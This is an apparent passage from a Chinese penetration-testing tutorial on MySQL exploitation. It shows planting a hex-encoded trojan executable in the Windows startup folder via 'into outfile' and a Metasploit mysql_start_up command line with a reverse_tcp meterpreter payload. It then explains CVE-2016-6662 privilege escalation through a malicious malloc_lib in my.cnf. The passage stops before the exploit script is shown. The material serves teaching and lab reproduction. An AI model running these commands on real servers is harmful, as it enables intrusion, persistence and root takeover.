内网渗透测试：MySql的利用与提权思路总结(7)

同样，我们也可以将exe写入到开机自启目录下，写入的方式与上文中讲的那几种方法一样，即先在本地将exe程序用mysql的hex()函数进行十六进制编码，然后利用into outfile...或into dumpfile写入到目标机的自启目录下。如下我们写入一个msf马“shell.exe”。

首先在攻击者本地将shell.exe进行十六进制转换：

select hex(load_file('shell.exe')) into outfile "shell.hex";

将得到的hex文件shell.hex里的内容复制出来，利用上文中写UDF文件的方法分段写入目标机自启目录下即可（老长了~~~）。

带目标服务器重启后，我们便可以得到目标主机的meterpreter：

Metasploit下的利用

如果你觉得上面手动的方法麻烦的话，metasploit中也集成了相应的模块：exploit/windows/mysql/mysql_start_up

使用如下：

use exploit/windows/mysql/mysql_start_up set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.7 set lport 4444 set rhosts 192.168.1.13 set username root set password root set startup_folder xxx # 根据目标系统进行设置自启目录 run

执行后，msf将在目标主机的启动项中写入一个exe的msf木马：

待目标主机重启后，便会得到目标主机的meterpreter：

MySQL 0day 漏洞 CVE-2016-6662（可将mysql权限提升为系统root权限）

2016年，一个独立的研究组织发现多处严重的Mysql漏洞，此次通报的是其中比较严重的一个漏洞CVE-2016-6662，它允许攻击者远程注入恶意配置到被攻击服务器的Mysql配置文件my.cnf中，导致可加载任意扩展库。当扩展库中存在恶意指令时就可以Getshell。

该漏洞影响的版本如下：

mysql <= 5.7.15

mysql <= 5.6.33

mysql <= 5.5.52

漏洞原理：

在Linux系统中，一些默认的Mysql安装包自带mysql_safe脚本作为包装器，当我们使用service mysql start、/etc/init.d/mysql start等命令启动MySQL时，mysqld_safe封装脚本是以root权限启动的，而主要的mysqld进程却是用权限较低的mysql用户启动的。并且mysql_safe脚本将在mysql服务启动前预加载一个扩展库，这个扩展库可以在MySQL的配置文件my.cnf中通过名为malloc_lib的配置项进行设置，该配置项写在[mysqld]下。

如果我们在my.cnf中通过malloc_lib配置项指定一个存在恶意代码的扩展库路径，那么在mysql重启的时候，这些代码将被以root权限执行，实现权限提升。

漏洞利用条件：

攻击者已经获得了目标主机MySQL的权限

目标主机的MySQL版本在漏洞影响范围内

攻击者当前获得权限的MySQL用户为root权限（否则无法修改general_log_file全局变量）

下面，我们来复现该漏洞。

实验环境：

目标机IP：192.168.1.10

攻击机IP：192.168.1.7

首先，我们下载一个C脚本，用来编译成我们恶意的扩展库，可获得目标机的shell：

如下修改该攻击脚本：